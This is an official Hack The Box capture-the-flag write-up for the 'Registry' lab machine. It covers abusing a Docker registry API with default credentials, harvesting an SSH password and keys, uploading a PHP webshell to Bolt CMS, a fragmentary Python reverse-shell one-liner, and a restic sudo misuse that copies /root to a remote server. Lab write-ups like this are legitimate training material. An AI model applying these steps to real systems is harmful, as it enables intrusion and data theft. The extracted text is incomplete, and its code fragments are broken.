213-Registry HTB Official Writeup Tamarisk
213-Registry HTB Official Writeup Tamarisk
213-Registry HTB Official Writeup Tamarisk
24th March 2020 / Document No D20.200.67
Difficulty: Hard
Classification: Official
Registry is a hard difficulty Linux machine, which features Docker and the Bolt CMS running on
Nginx. Docker registry API access is configured with default credentials, which allows us to pull
the repository files. Using the disclosed information it is possible to obtain an initial foothold.
User credentials for Bolt CMS can be obtained, and exploiting the CMS provides us with access to
the www-data user, who has a sudo entry to perform backups as root using the restic program.
After taking a backup of the root folder remotely and mounting the repository with restic, the
root flag is obtained.
Skills Required
Port Forwarding
Skills Learned
Docker API
Web Exploitation
Restic Exploitation
SSH and Nginx are running on ports 22, 80 and 443 respectively. Nmap also reveals the Common
Name docker.registry.htb from the SSL certificate.
On browsing to ports 80 and 443 in a browser, we see default Nginx page.
We can add docker.registry.htb to our /etc/hosts and browse to it, which just shows an
empty page.
The Docker v2 API docs state that we can list repositories using /v2/_catalog . This finds the
bolt-image repository.
Every repository contains different versions, which we can obtain using /v2/bolt-
image/tags/list .
We can view the manifest of latest version of the bolt-image repository to learn information
about the image, such as layers, size and digest.
We can download blobs from /v2/bolt-image/blogs/sha256: endpoint.
After running the command we see that a list of files have been downloaded.
Looking at the .viminfo file, we see the SSH password GkOcz221Ftb3ugog exposed on the
command line.
We also find SSH keys inside the .ssh folder. The public key reveals the username bolt .
We can now gain access to the server as bolt user using their private key and passphrase.
Lateral Movement
Looking at /var/www/html/ , we can see there's an application called bolt running on the
server, and backup.php reveals the domain name backup.registry.htb .
We can login to the bolt application with the credentials admin : strawberry .
Under Configuration > Main Configuration we can see what file types are allowed to be
Edit config.yml to allow the php extension, and click Save.
We can proceed to upload a webshell with the contents below using the File Manager .
/usr/bin/python -c 'import
t(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
Privilege Escalation
Running linpeas reveals an interesting sudo entry
Restic is a backup program. From sudo entry we can see that www-data is permitted to run this
program as root, in order to backup data to a remote server via rest.
After setting password for user we can initialise a new repository for backup
We can do a remote port forward in order to make rest server available from Registry.
Now we can perform a backup of root folder to the remote server under our control.